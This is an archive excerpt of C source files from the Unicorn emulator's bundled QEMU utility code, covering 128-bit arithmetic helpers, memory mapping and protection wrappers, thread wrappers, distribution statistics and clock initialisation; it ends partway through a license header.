*/ #include "qemu/osdep.h" #include "qemu/host-utils.h" #ifndef CONFIG_INT128 /* Long integer helpers */ static inline void mul64(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { typedef union { uint64_t ll; struct { #ifdef HOST_WORDS_BIGENDIAN uint32_t high, low; #else uint32_t low, high; #endif } l; } LL; LL rl, rm, rn, rh, a0, b0; uint64_t c; a0.ll = a; b0.ll = b; rl.ll = (uint64_t)a0.l.low * b0.l.low; rm.ll = (uint64_t)a0.l.low * b0.l.high; rn.ll = (uint64_t)a0.l.high * b0.l.low; rh.ll = (uint64_t)a0.l.high * b0.l.high; c = (uint64_t)rl.l.high + rm.l.low + rn.l.low; rl.l.high = c; c >>= 32; c = c + rm.l.high + rn.l.high + rh.l.low; rh.l.low = c; rh.l.high += (uint32_t)(c >> 32); *plow = rl.ll; *phigh = rh.ll; } /* Unsigned 64x64 -> 128 multiplication */ void mulu64 (uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) { mul64(plow, phigh, a, b); } /* Signed 64x64 -> 128 multiplication */ void muls64 (uint64_t *plow, uint64_t *phigh, int64_t a, int64_t b) { uint64_t rh; mul64(plow, &rh, a, b); /* Adjust for signs. */ if (b < 0) { rh -= a; } if (a < 0) { rh -= b; } *phigh = rh; } /* Unsigned 128x64 division. Returns 1 if overflow (divide by zero or */ /* quotient exceeds 64 bits). Otherwise returns quotient via plow and */ /* remainder via phigh. */ int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) { uint64_t dhi = *phigh; uint64_t dlo = *plow; unsigned i; uint64_t carry = 0; if (divisor == 0) { return 1; } else if (dhi == 0) { *plow = dlo / divisor; *phigh = dlo % divisor; return 0; } else if (dhi > divisor) { return 1; } else { for (i = 0; i < 64; i++) { carry = dhi >> 63; dhi = (dhi << 1) | (dlo >> 63); if (carry || (dhi >= divisor)) { dhi -= divisor; carry = 1; } else { carry = 0; } dlo = (dlo << 1) | carry; } *plow = dlo; *phigh = dhi; return 0; } } int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) { int sgn_dvdnd = *phigh < 0; int sgn_divsr = divisor < 0; int overflow = 0; if (sgn_dvdnd) { *plow = ~(*plow); *phigh = ~(*phigh); if (*plow == (int64_t)-1) { *plow = 0; (*phigh)++; } else { (*plow)++; } } if (sgn_divsr) { divisor = 0 - divisor; } overflow = divu128((uint64_t *)plow, (uint64_t *)phigh, (uint64_t)divisor); if (sgn_dvdnd ^ sgn_divsr) { *plow = 0 - *plow; } if (!overflow) { if ((*plow < 0) ^ (sgn_dvdnd ^ sgn_divsr)) { overflow = 1; } } return overflow; } #endif /** * urshift - 128-bit Unsigned Right Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. */ void urshift(uint64_t *plow, uint64_t *phigh, int32_t shift) { shift &= 127; if (shift == 0) { return; } uint64_t h = *phigh >> (shift & 63); if (shift >= 64) { *plow = h; *phigh = 0; } else { *plow = (*plow >> (shift & 63)) | (*phigh << (64 - (shift & 63))); *phigh = h; } } /** * ulshift - 128-bit Unsigned Left Shift. * @plow: in/out - lower 64-bit integer. * @phigh: in/out - higher 64-bit integer. * @shift: in - bytes to shift, between 0 and 127. * @overflow: out - true if any 1-bit is shifted out. * * Result is zero-extended and stored in plow/phigh, which are * input/output variables. Shift values outside the range will * be mod to 128. In other words, the caller is responsible to * verify/assert both the shift range and plow/phigh pointers. 
*/ void ulshift(uint64_t *plow, uint64_t *phigh, int32_t shift, bool *overflow) { uint64_t low = *plow; uint64_t high = *phigh; shift &= 127; if (shift == 0) { return; } /* check if any bit will be shifted out */ urshift(&low, &high, 128 - shift); if (low | high) { *overflow = true; } if (shift >= 64) { *phigh = *plow << (shift & 63); *plow = 0; } else { *phigh = (*plow >> (64 - (shift & 63))) | (*phigh << (shift & 63)); *plow = *plow << shift; } } �����������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/osdep.c���������������������������������������������������������������������0000664�0000000�0000000�00000005321�14675241067�0016407�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU low level functions * * Copyright (c) 2003 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" /* Needed early for CONFIG_BSD etc. 
*/ #ifdef CONFIG_SOLARIS #include <sys/statvfs.h> /* See MySQL bug #7156 (http://bugs.mysql.com/bug.php?id=7156) for discussion about Solaris header problems */ extern int madvise(char *, size_t, int); #endif #include "qemu-common.h" #include "qemu/cutils.h" int qemu_madvise(void *addr, size_t len, int advice) { if (advice == QEMU_MADV_INVALID) { errno = EINVAL; return -1; } #if defined(CONFIG_MADVISE) return madvise(addr, len, advice); #elif defined(CONFIG_POSIX_MADVISE) return posix_madvise(addr, len, advice); #else errno = EINVAL; return -1; #endif } static int qemu_mprotect__osdep(void *addr, size_t size, int prot) { #ifdef _WIN32 DWORD old_protect; if (!VirtualProtect(addr, size, prot, &old_protect)) { // g_autofree gchar *emsg = g_win32_error_message(GetLastError()); // error_report("%s: VirtualProtect failed: %s", __func__, emsg); return -1; } return 0; #else if (mprotect(addr, size, prot)) { // error_report("%s: mprotect failed: %s", __func__, strerror(errno)); return -1; } return 0; #endif } int qemu_mprotect_rwx(void *addr, size_t size) { #ifdef _WIN32 return qemu_mprotect__osdep(addr, size, PAGE_EXECUTE_READWRITE); #else return qemu_mprotect__osdep(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC); #endif } int qemu_mprotect_none(void *addr, size_t size) { #ifdef _WIN32 return qemu_mprotect__osdep(addr, size, PAGE_NOACCESS); #else return qemu_mprotect__osdep(addr, size, PROT_NONE); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/oslib-posix.c���������������������������������������������������������������0000664�0000000�0000000�00000016323�14675241067�0017551�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * os-posix-lib.c * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2010 Red Hat, Inc. * * QEMU library functions on POSIX which are shared between QEMU and * the QEMU tools. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ #include <uc_priv.h> #include "qemu/osdep.h" #ifdef CONFIG_LINUX #include <linux/mman.h> #else /* !CONFIG_LINUX */ #define MAP_SYNC 0x0 #define MAP_SHARED_VALIDATE 0x0 #endif /* CONFIG_LINUX */ #ifndef __MINGW32__ static void *qemu_ram_mmap(struct uc_struct *uc, size_t size, size_t align, bool shared); static void qemu_ram_munmap(struct uc_struct *uc, void *ptr, size_t size); #endif #if defined(__MINGW32__) && defined(__clang__) #include <windows.h> int getpagesize() { SYSTEM_INFO S; GetNativeSystemInfo(&S); return S.dwPageSize; } #endif void *qemu_oom_check(void *ptr) { if (ptr == NULL) { fprintf(stderr, "Failed to allocate memory: %s\n", strerror(errno)); abort(); } return ptr; } void *qemu_try_memalign(size_t alignment, size_t size) { void *ptr; if (alignment < sizeof(void*)) { alignment = sizeof(void*); } #if defined(CONFIG_POSIX_MEMALIGN) int ret; ret = posix_memalign(&ptr, alignment, size); if (ret != 0) { errno = ret; ptr = NULL; } #elif defined(CONFIG_BSD) ptr = valloc(size); #elif defined(__MINGW32__) ptr = __mingw_aligned_malloc(size, alignment); #else ptr = memalign(alignment, size); #endif //trace_qemu_memalign(alignment, size, ptr); return ptr; } void *qemu_memalign(size_t alignment, size_t size) { return qemu_oom_check(qemu_try_memalign(alignment, size)); } #ifdef __MINGW32__ static int get_allocation_granularity(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwAllocationGranularity; } #endif /* alloc shared memory pages */ void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *alignment) { #ifdef __MINGW32__ void *ptr; ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); // trace_qemu_anon_ram_alloc(size, ptr); if (ptr && alignment) { *alignment = MAX(get_allocation_granularity(), getpagesize()); } return ptr; #else size_t align = QEMU_VMALLOC_ALIGN; void *ptr = qemu_ram_mmap(uc, size, align, false); if (ptr == MAP_FAILED) { return NULL; } if (alignment) { *alignment = align; } //trace_qemu_anon_ram_alloc(size, ptr); return ptr; #endif } void qemu_vfree(void *ptr) { #ifdef __MINGW32__ if (ptr) { __mingw_aligned_free(ptr); } #else //trace_qemu_vfree(ptr); free(ptr); #endif } void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size) { #ifdef __MINGW32__ if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } #else //trace_qemu_anon_ram_free(ptr, size); qemu_ram_munmap(uc, ptr, size); #endif } #if defined(__powerpc64__) && defined(__linux__) static size_t qemu_fd_getpagesize(struct uc_struct *uc) { #ifdef CONFIG_LINUX #ifdef __sparc__ /* SPARC Linux needs greater alignment than the pagesize */ return QEMU_VMALLOC_ALIGN; #endif #endif return uc->qemu_real_host_page_size; } #endif #ifndef __MINGW32__ static void *qemu_ram_mmap(struct uc_struct *uc, size_t size, size_t align, bool shared) { int flags; int map_sync_flags = 0; int guardfd; size_t offset; size_t pagesize; size_t total; void *guardptr; void *ptr; /* * Note: this always allocates at least one extra page of virtual address * space, even if size is already aligned. */ total = size + align; #if defined(__powerpc64__) && defined(__linux__) /* On ppc64 mappings in the same segment (aka slice) must share the same * page size. Since we will be re-allocating part of this segment * from the supplied fd, we should make sure to use the same page size, to * this end we mmap the supplied fd. In this case, set MAP_NORESERVE to * avoid allocating backing store memory. * We do this unless we are using the system page size, in which case * anonymous memory is OK. 
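     *
     * Whatever the host, the allocation scheme below is the same: reserve
     * size + align bytes of PROT_NONE address space, place the usable
     * mapping at the first align-boundary inside that reservation, and
     * keep one trailing PROT_NONE page as a guard against buffer overruns.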
*/ flags = MAP_PRIVATE; pagesize = qemu_fd_getpagesize(uc); if (pagesize == uc->qemu_real_host_page_size) { guardfd = -1; flags |= MAP_ANONYMOUS; } else { guardfd = -1; flags |= MAP_NORESERVE; } #else guardfd = -1; pagesize = uc->qemu_real_host_page_size; flags = MAP_PRIVATE | MAP_ANONYMOUS; #endif guardptr = mmap(0, total, PROT_NONE, flags, guardfd, 0); if (guardptr == MAP_FAILED) { return MAP_FAILED; } assert(is_power_of_2(align)); /* Always align to host page size */ assert(align >= pagesize); flags = MAP_FIXED; flags |= MAP_ANONYMOUS; flags |= shared ? MAP_SHARED : MAP_PRIVATE; offset = QEMU_ALIGN_UP((uintptr_t)guardptr, align) - (uintptr_t)guardptr; ptr = mmap(guardptr + offset, size, PROT_READ | PROT_WRITE, flags | map_sync_flags, -1, 0); if (ptr == MAP_FAILED && map_sync_flags) { /* * if map failed with MAP_SHARED_VALIDATE | MAP_SYNC, * we will remove these flags to handle compatibility. */ ptr = mmap(guardptr + offset, size, PROT_READ | PROT_WRITE, flags, -1, 0); } if (ptr == MAP_FAILED) { munmap(guardptr, total); return MAP_FAILED; } if (offset > 0) { munmap(guardptr, offset); } /* * Leave a single PROT_NONE page allocated after the RAM block, to serve as * a guard page guarding against potential buffer overflows. */ total -= offset; if (total > size + pagesize) { munmap(ptr + size + pagesize, total - size - pagesize); } return ptr; } static void qemu_ram_munmap(struct uc_struct *uc, void *ptr, size_t size) { size_t pagesize; if (ptr) { /* Unmap both the RAM block and the guard page */ #if defined(__powerpc64__) && defined(__linux__) pagesize = qemu_fd_getpagesize(uc); #else pagesize = uc->qemu_real_host_page_size; #endif munmap(ptr, size + pagesize); } } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/oslib-win32.c���������������������������������������������������������������0000664�0000000�0000000�00000005736�14675241067�0017357�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * os-win32.c * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2010-2016 Red Hat, Inc. * * QEMU library functions for win32 which are shared between QEMU and * the QEMU tools. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * The implementation of g_poll (functions poll_rest, g_poll) at the end of * this file are based on code from GNOME glib-2 and use a different license, * see the license comment there. */ #include <uc_priv.h> #include "qemu/osdep.h" #include <windows.h> #include "qemu-common.h" #include "sysemu/sysemu.h" void *qemu_oom_check(void *ptr) { if (ptr == NULL) { fprintf(stderr, "Failed to allocate memory: %lu\n", GetLastError()); abort(); } return ptr; } void *qemu_try_memalign(size_t alignment, size_t size) { void *ptr; if (!size) { abort(); } ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); //trace_qemu_memalign(alignment, size, ptr); return ptr; } void *qemu_memalign(size_t alignment, size_t size) { return qemu_oom_check(qemu_try_memalign(alignment, size)); } static int get_allocation_granularity(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwAllocationGranularity; } void *qemu_anon_ram_alloc(struct uc_struct *uc, size_t size, uint64_t *align) { void *ptr; ptr = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE); // trace_qemu_anon_ram_alloc(size, ptr); if (ptr && align) { *align = MAX(get_allocation_granularity(), getpagesize()); } return ptr; } void qemu_vfree(void *ptr) { //trace_qemu_vfree(ptr); if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } } void qemu_anon_ram_free(struct uc_struct *uc, void *ptr, size_t size) { //trace_qemu_anon_ram_free(ptr, size); if (ptr) { VirtualFree(ptr, 0, MEM_RELEASE); } } int getpagesize(void) { SYSTEM_INFO system_info; GetSystemInfo(&system_info); return system_info.dwPageSize; } ����������������������������������unicorn-2.1.1/qemu/util/pagesize.c������������������������������������������������������������������0000664�0000000�0000000�00000000555�14675241067�0017110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * pagesize.c - query the host about its page size * * Copyright (C) 2017, Emilio G. Cota <cota@braap.org> * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include <uc_priv.h> void init_real_host_page_size(struct uc_struct *uc) { uc->qemu_real_host_page_size = getpagesize(); } ���������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qdist.c���������������������������������������������������������������������0000664�0000000�0000000�00000011627�14675241067�0016427�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * qdist.c - QEMU helpers for handling frequency distributions of data. * * Copyright (C) 2016, Emilio G. 
Cota <cota@braap.org> * * License: GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include "qemu/qdist.h" #include <math.h> #ifndef NAN #define NAN (0.0 / 0.0) #endif #define QDIST_EMPTY_STR "(empty)" void qdist_init(struct qdist *dist) { dist->entries = g_new(struct qdist_entry, 1); dist->size = 1; dist->n = 0; } void qdist_destroy(struct qdist *dist) { g_free(dist->entries); } static inline int qdist_cmp_double(double a, double b) { if (a > b) { return 1; } else if (a < b) { return -1; } return 0; } static int qdist_cmp(const void *ap, const void *bp) { const struct qdist_entry *a = ap; const struct qdist_entry *b = bp; return qdist_cmp_double(a->x, b->x); } void qdist_add(struct qdist *dist, double x, long count) { struct qdist_entry *entry = NULL; if (dist->n) { struct qdist_entry e; e.x = x; entry = bsearch(&e, dist->entries, dist->n, sizeof(e), qdist_cmp); } if (entry) { entry->count += count; return; } if (unlikely(dist->n == dist->size)) { dist->size *= 2; dist->entries = g_renew(struct qdist_entry, dist->entries, dist->size); } dist->n++; entry = &dist->entries[dist->n - 1]; entry->x = x; entry->count = count; qsort(dist->entries, dist->n, sizeof(*entry), qdist_cmp); } void qdist_inc(struct qdist *dist, double x) { qdist_add(dist, x, 1); } /* * Bin the distribution in @from into @n bins of consecutive, non-overlapping * intervals, copying the result to @to. * * This function is internal to qdist: only this file and test code should * ever call it. * * Note: calling this function on an already-binned qdist is a bug. * * If @n == 0 or @from->n == 1, use @from->n. */ void qdist_bin__internal(struct qdist *to, const struct qdist *from, size_t n) { double xmin, xmax; double step; size_t i, j; qdist_init(to); if (from->n == 0) { return; } if (n == 0 || from->n == 1) { n = from->n; } /* set equally-sized bins between @from's left and right */ xmin = qdist_xmin(from); xmax = qdist_xmax(from); step = (xmax - xmin) / n; if (n == from->n) { /* if @from's entries are equally spaced, no need to re-bin */ for (i = 0; i < from->n; i++) { if (from->entries[i].x != xmin + i * step) { goto rebin; } } /* they're equally spaced, so copy the dist and bail out */ to->entries = g_renew(struct qdist_entry, to->entries, n); to->n = from->n; memcpy(to->entries, from->entries, sizeof(*to->entries) * to->n); return; } rebin: j = 0; for (i = 0; i < n; i++) { double x; double left, right; left = xmin + i * step; right = xmin + (i + 1) * step; /* Add x, even if it might not get any counts later */ x = left; qdist_add(to, x, 0); /* * To avoid double-counting we capture [left, right) ranges, except for * the righmost bin, which captures a [left, right] range. 
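         *
         * For example (a sketch): binning the points {0, 1, 2, 3} into
         * n = 2 bins makes step = 1.5, so the first bin captures
         * [0, 1.5) -- the counts for 0 and 1 -- and the final bin
         * captures [1.5, 3], picking up the counts for 2 and 3.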
*/ while (j < from->n && (from->entries[j].x < right || i == n - 1)) { struct qdist_entry *o = &from->entries[j]; qdist_add(to, x, o->count); j++; } } } static inline double qdist_x(const struct qdist *dist, int index) { if (dist->n == 0) { return NAN; } return dist->entries[index].x; } double qdist_xmin(const struct qdist *dist) { return qdist_x(dist, 0); } double qdist_xmax(const struct qdist *dist) { return qdist_x(dist, dist->n - 1); } size_t qdist_unique_entries(const struct qdist *dist) { return dist->n; } unsigned long qdist_sample_count(const struct qdist *dist) { unsigned long count = 0; size_t i; for (i = 0; i < dist->n; i++) { struct qdist_entry *e = &dist->entries[i]; count += e->count; } return count; } static double qdist_pairwise_avg(const struct qdist *dist, size_t index, size_t n, unsigned long count) { /* amortize the recursion by using a base case > 2 */ if (n <= 8) { size_t i; double ret = 0; for (i = 0; i < n; i++) { struct qdist_entry *e = &dist->entries[index + i]; ret += e->x * e->count / count; } return ret; } else { size_t n2 = n / 2; return qdist_pairwise_avg(dist, index, n2, count) + qdist_pairwise_avg(dist, index + n2, n - n2, count); } } double qdist_avg(const struct qdist *dist) { unsigned long count; count = qdist_sample_count(dist); if (!count) { return NAN; } return qdist_pairwise_avg(dist, 0, dist->n, count); } ���������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-thread-posix.c���������������������������������������������������������0000664�0000000�0000000�00000003312�14675241067�0020647�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Wrappers around mutex/cond/thread functions * * Copyright Red Hat, Inc. 2009 * * Author: * Marcelo Tosatti <mtosatti@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. 
* */ #include <stdlib.h> #include <stdio.h> #include <signal.h> #include <string.h> #include "qemu/thread.h" static void error_exit(int err, const char *msg) { fprintf(stderr, "qemu: %s: %s\n", msg, strerror(err)); abort(); } int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, void *(*start_routine)(void*), void *arg, int mode) { #ifndef __MINGW32__ sigset_t set, oldset; #endif int err; pthread_attr_t attr; err = pthread_attr_init(&attr); if (err) { error_exit(err, __func__); return -1; } if (mode == QEMU_THREAD_DETACHED) { err = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); if (err) { error_exit(err, __func__); return -1; } } #ifndef __MINGW32__ sigfillset(&set); #endif pthread_sigmask(SIG_SETMASK, &set, &oldset); err = pthread_create(&thread->thread, &attr, start_routine, arg); if (err) { error_exit(err, __func__); return -1; } pthread_sigmask(SIG_SETMASK, &oldset, NULL); pthread_attr_destroy(&attr); return 0; } void qemu_thread_exit(struct uc_struct *uc, void *retval) { pthread_exit(retval); } void *qemu_thread_join(QemuThread *thread) { int err; void *ret; err = pthread_join(thread->thread, &ret); if (err) { error_exit(err, __func__); } return ret; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-thread-win32.c���������������������������������������������������������0000664�0000000�0000000�00000007633�14675241067�0020461�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Win32 implementation for mutex/cond/thread functions * * Copyright Red Hat, Inc. 2010 * * Author: * Paolo Bonzini <pbonzini@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include "qemu-common.h" #include "qemu/thread.h" #include <process.h> #include <assert.h> #include <limits.h> #include "uc_priv.h" static void error_exit(int err, const char *msg) { char *pstr; FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, NULL, err, 0, (LPTSTR)&pstr, 2, NULL); fprintf(stderr, "qemu: %s: %s\n", msg, pstr); LocalFree(pstr); //abort(); } struct QemuThreadData { /* Passed to win32_start_routine. */ void *(*start_routine)(void *); void *arg; short mode; /* Only used for joinable threads. 
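       A detached thread frees its QemuThreadData as soon as it starts,
       so only joinable threads ever touch the fields below: the joiner
       re-opens a handle from the TID (checking 'exited' under cs), waits
       on it, and then collects ret.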
*/ bool exited; void *ret; CRITICAL_SECTION cs; struct uc_struct *uc; }; static unsigned __stdcall win32_start_routine(void *arg) { QemuThreadData *data = (QemuThreadData *) arg; void *(*start_routine)(void *) = data->start_routine; void *thread_arg = data->arg; if (data->mode == QEMU_THREAD_DETACHED) { data->uc->qemu_thread_data = NULL; g_free(data); data = NULL; } qemu_thread_exit(data->uc, start_routine(thread_arg)); abort(); } void qemu_thread_exit(struct uc_struct *uc, void *arg) { QemuThreadData *data = uc->qemu_thread_data; if (data) { assert(data->mode != QEMU_THREAD_DETACHED); data->ret = arg; EnterCriticalSection(&data->cs); data->exited = true; LeaveCriticalSection(&data->cs); } _endthreadex(0); } void *qemu_thread_join(QemuThread *thread) { QemuThreadData *data; void *ret; HANDLE handle; data = thread->data; if (!data) { return NULL; } /* * Because multiple copies of the QemuThread can exist via * qemu_thread_get_self, we need to store a value that cannot * leak there. The simplest, non racy way is to store the TID, * discard the handle that _beginthreadex gives back, and * get another copy of the handle here. */ handle = qemu_thread_get_handle(thread); if (handle) { WaitForSingleObject(handle, INFINITE); CloseHandle(handle); } ret = data->ret; assert(data->mode != QEMU_THREAD_DETACHED); DeleteCriticalSection(&data->cs); data->uc->qemu_thread_data = NULL; g_free(data); data = NULL; return ret; } int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, void *(*start_routine)(void *), void *arg, int mode) { HANDLE hThread; struct QemuThreadData *data; data = g_malloc(sizeof *data); data->start_routine = start_routine; data->arg = arg; data->mode = mode; data->exited = false; data->uc = uc; uc->qemu_thread_data = data; if (data->mode != QEMU_THREAD_DETACHED) { InitializeCriticalSection(&data->cs); } hThread = (HANDLE) _beginthreadex(NULL, 0, win32_start_routine, data, 0, &thread->tid); if (!hThread) { error_exit(GetLastError(), __func__); return -1; } CloseHandle(hThread); thread->data = (mode == QEMU_THREAD_DETACHED) ? 
NULL : data; return 0; } HANDLE qemu_thread_get_handle(QemuThread *thread) { QemuThreadData *data; HANDLE handle; data = thread->data; if (!data) { return NULL; } assert(data->mode != QEMU_THREAD_DETACHED); EnterCriticalSection(&data->cs); if (!data->exited) { handle = OpenThread(SYNCHRONIZE | THREAD_SUSPEND_RESUME, FALSE, thread->tid); } else { handle = NULL; } LeaveCriticalSection(&data->cs); return handle; } �����������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-timer-common.c���������������������������������������������������������0000664�0000000�0000000�00000003345�14675241067�0020654�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. 
*/ #include "qemu/osdep.h" #include "qemu/timer.h" /***********************************************************/ /* real time host monotonic timer */ #ifdef _WIN32 int64_t clock_freq; void init_get_clock(void) { LARGE_INTEGER freq; int ret = QueryPerformanceFrequency(&freq); if (ret == 0) { fprintf(stderr, "Could not calibrate ticks\n"); exit(1); } clock_freq = freq.QuadPart; } #else int use_rt_clock; void init_get_clock(void) { struct timespec ts; use_rt_clock = 0; if (clock_gettime(CLOCK_MONOTONIC, &ts) == 0) { use_rt_clock = 1; } } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/util/qemu-timer.c����������������������������������������������������������������0000664�0000000�0000000�00000002502�14675241067�0017360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR 